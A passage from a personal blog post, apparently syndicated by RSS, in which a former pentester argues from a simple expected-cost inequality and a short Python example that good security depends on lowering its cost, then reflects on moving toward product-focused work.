<figure class="mx-auto"><img alt="Encode Club AI Hackathon in London" loading="lazy" width="2048" height="1536" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fencode.3dc79b04.jpg&amp;w=2048&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fencode.3dc79b04.jpg&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fencode.3dc79b04.jpg&amp;w=3840&amp;q=75"><figcaption class="text-center">Encode Club AI Hackathon in London</figcaption></figure>
<h2>How do we do good security, then?</h2>
<p>I'm spending this summer at <a href="https://www.open.gov.sg/">Open Government Products</a>, where I now have much more time to think about how to solve security
problems at scale, and in a way that lasts. I started to appreciate why security can be so hard, and why it's not just a matter of "just fixing it".</p>
<p>The truth is, security is hard because it's not just about fixing bugs. It's about fixing the process that led to the bug in the first place.
The organisations that are having repeated security incidents are the ones that have a broken process, often because they grew too fast without
thinking about security, and now they're playing catch-up. But it's hard to catch up when the processes you've put in place and the tools developers
have gotten comfortable with need to be fundamentally changed.</p>
<p>Security is not prioritised enough because the cost of poor security is not immediately visible. It's hard to quantify the cost of a security incident
that didn't happen, and it's hard to justify the cost of investing in security when you're not seeing any immediate benefits.
There are no returns when investing in security, only losses when you don't.</p>
<p>And if the probability of an incident is low in the first place, then the expected cost of standing around doing nothing, waiting for an incident to happen,
is lower than the cost of investing in security.</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right left" columnspacing="0em"><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mi>E</mi><mo stretchy="false">[</mo><mtext>cost&nbsp;of&nbsp;doing&nbsp;nothing</mtext><mo stretchy="false">]</mo></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mo>=</mo><mi>P</mi><mo stretchy="false">(</mo><mtext>incident</mtext><mo stretchy="false">)</mo><mo>×</mo><mtext>cost&nbsp;of&nbsp;incident</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mo>&lt;</mo><mtext>cost&nbsp;of&nbsp;investing&nbsp;in&nbsp;security</mtext></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{align*}
E[\text{{cost of doing nothing}}] &amp;= P(\text{{incident}}) \times \text{{cost of incident}} \\
                             &amp;&lt; \text{{cost of investing in security}}
\end{align*}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:3em;vertical-align:-1.25em"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.75em"><span style="top:-3.91em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.05764em">E</span><span class="mopen">[</span><span class="mord text"><span class="mord"><span class="mord">cost&nbsp;of&nbsp;doing&nbsp;nothing</span></span></span><span class="mclose">]</span></span></span><span style="top:-2.41em"><span class="pstrut" style="height:3em"></span><span class="mord"></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.25em"><span></span></span></span></span></span><span class="col-align-l"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.75em"><span style="top:-3.91em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord mathnormal" style="margin-right:0.13889em">P</span><span class="mopen">(</span><span class="mord text"><span class="mord"><span class="mord">incident</span></span></span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mord text"><span class="mord"><span class="mord">cost&nbsp;of&nbsp;incident</span></span></span></span></span><span style="top:-2.41em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"></span><span class="mspace" style="margin-right:0.2778em"></span><span 
class="mrel">&lt;</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord text"><span class="mord"><span class="mord">cost&nbsp;of&nbsp;investing&nbsp;in&nbsp;security</span></span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.25em"><span></span></span></span></span></span></span></span></span></span></span></span>
<p>And when the expected cost of doing nothing is lower than the cost of investing in security, the rational decision is to do nothing.</p>
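<p>To make that concrete, here is a minimal sketch in Python. The numbers are made up and the function names are hypothetical. It also assumes, as the inequality above implicitly does, that investing in security removes the incident risk entirely.</p>

```python
def expected_cost_of_doing_nothing(p_incident: float, cost_of_incident: float) -> float:
    """E[cost of doing nothing] = P(incident) x cost of incident."""
    return p_incident * cost_of_incident


def rational_choice(p_incident: float, cost_of_incident: float, cost_of_security: float) -> str:
    """Pick the option with the lower expected cost.

    Simplifying assumption: paying for security removes the incident risk entirely.
    """
    expected_loss = expected_cost_of_doing_nothing(p_incident, cost_of_incident)
    return "invest" if expected_loss > cost_of_security else "do nothing"


# Hypothetical figures: a 2% chance of an incident that would cost 1,000,000.
P_INCIDENT = 0.02
COST_OF_INCIDENT = 1_000_000

# With an expensive security programme, doing nothing looks rational.
print(rational_choice(P_INCIDENT, COST_OF_INCIDENT, cost_of_security=50_000))

# With a cheap one, the same risk justifies investing.
print(rational_choice(P_INCIDENT, COST_OF_INCIDENT, cost_of_security=5_000))
```

<p>The probability and the cost of the incident are the same in both calls. Only the cost of security changes, and that alone is enough to flip the decision.</p>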
<p>So to do good security, you probably need to reduce the cost of security. This means making it easy to do the right thing: in Ross Anderson's
<a href="https://www.cl.cam.ac.uk/teaching/2324/SWSecEng/">Software and Security Engineering</a> course, there was a lot of emphasis on making the secure
thing the easiest, or the default, thing to do without compromising on usability.</p>
<p>That means building tools that developers actually want to use, or something so low-friction that they don't even realise they're using it.
It means building security into the process from the start, and not as an afterthought.</p>
<h2>I can never truly quit security</h2>
<p>I don't think I can ever truly quit security. I still love doing it on the side with fun research projects and freelance pentesting work outside
of my day job or school. Besides, how do you "quit" something so fundamentally important to everything else you might do in tech?
But I'm ready to take a pause on popping shells all the time and start building things that last.</p>
<p>And there are so many things I take with me from my time in security. I've learnt how to think adversarially, which helps a lot in writing
good software. I've learnt how to communicate complex ideas in a way that's easy to understand. I've picked up an attention to detail
that I didn't have before. I've learnt how to learn.</p>
<p>I think this is probably a good balance. Doing security as both a hobby <em>and</em> a job is probably too much for me. I think the analogy "it's a marathon,
not a sprint" is very apt here. Unfortunately I'm at that age where I need to be a bit more realistic about what I want in my career, and I need to know
I will still enjoy what I'm doing 10 years down the line.</p>
<p>I'm still not <em>entirely</em> sure what I <em>do</em> want to do, but I know I've found a passion for being as close to the product as possible. I'm at my best
when I work on meaningful problems that serve a clear purpose in the world and where I can clearly see the impact of my work.</p>
<p>This has been a long and quite personal post, and I don't want to impose any particular message on anyone. I just re-made my personal site and decided
it made sense to write my first post on where I'm at right now. Wherever you are, I hope you're doing well, and I hope you're doing what you love!</p>
<p>Oh, and please remember to touch grass.</p>
<figure class="mx-auto"><img alt="Touch grass" loading="lazy" width="1440" height="1440" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fgrass.16107f69.jpg&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fgrass.16107f69.jpg&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fgrass.16107f69.jpg&amp;w=3840&amp;q=75"><figcaption class="text-center">Touch grass</figcaption></figure>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
    </channel>
</rss>